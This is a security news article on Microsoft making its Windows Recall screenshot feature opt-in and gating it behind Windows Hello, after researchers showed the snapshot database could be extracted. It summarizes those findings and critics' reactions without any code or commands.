AI/ML, AI benefits/risks, Privileged access management

Microsoft rethinks Recall feature for Copilot after backlash over security

(Credit: Robert – stock.adobe.com)

Microsoft’s upcoming AI-powered Windows “Recall” feature, which takes screenshots of users’ active screen every few seconds, will undergo some changes following backlash from security experts.

The feature received a large amount of criticism from consumers and industry professionals immediately after it was announced on May 20, with Malwarebytes calling it a “built-in keylogger” and software engineer and Web3 critic Molly White calling it “spyware.”

The concerns were compounded by the fact that Recall does not, according to Microsoft, censor sensitive information in the snapshots it takes, such as passwords or financial information. This would potentially make the database of Recall snapshots on a user’s computer a gold mine for hackers, with tons of sensitive data all in one place and easily searchable using the AI-powered search feature.

Microsoft insisted users’ privacy was protected due to all Recall data being stored locally and encrypted by Device Encryption or BitLocker. The feature, which would be enabled by default on Copilot+ PCs, could also be disabled and configured to not record specific sites and apps.

However, in the weeks since Recall was announced, multiple security pros have put available previews to the test and demonstrated ways the Recall database can be accessed and exploited to steal sensitive data en masse.

For example, Alex Hagenah, head of cyber controls at SIX Group and technical advisory board member at HackerOne, developed a “very simple’ proof-of-concept tool called “TotalRecall,” which copies, searches and extracts information from the Recall database file.

Additionally, James Forshaw, a security research in Google Project Zero, published a blog post about bypassing access control lists, which includes an edit revealing that the Recall database can be accessed by a user without administrative privileges by using a token from the Windows AIXHost.exe process or simply rewriting the discretionary access control list, as the database is considered to be owned by the user.

In response to “customer feedback,” Microsoft announced in a blog post on Friday that Recall would no longer be activated by default, requiring users to opt-in to use the feature. Additionally, users will need to complete the Windows Hello biometric enrollment process to enable Recall, lowering the chance that a hacker could enable it on the machine of a user who had opted out.

Proof of presence through Windows Hello will be required to view the Recall timeline and use the AI-powered search tool, and the snapshots will only be decrypted upon user authentication via Windows Hello Enhanced Sign-in Security, Microsoft said.

“We want to reinforce what has previously been shared from David Weston, vice president of Enterprise and OS Security, about how Copilot+ PCs have been designed to be secure by default,” the blog post stated.

Kevin Beaumont, a security researcher and former senior threat intelligence analyst at Microsoft, who has been a vocal critic of Recall since its announcement, responded positively to the update.

“Turns out speaking up works,” Beaumont wrote on X.

“There are obviously going to be devils in the details – potentially big ones – but there’s some good elements here. Microsoft needs to commit to not trying to sneak users to enable it in the future, and it needs turning off by default in Group Policy and Intune for enterprise orgs,” Beaumont added.

Get daily email updates

SC Media's daily must-read of the most current and pressing daily news

By clicking the Subscribe button below, you agree to SC Media Terms and Conditions and Privacy Policy.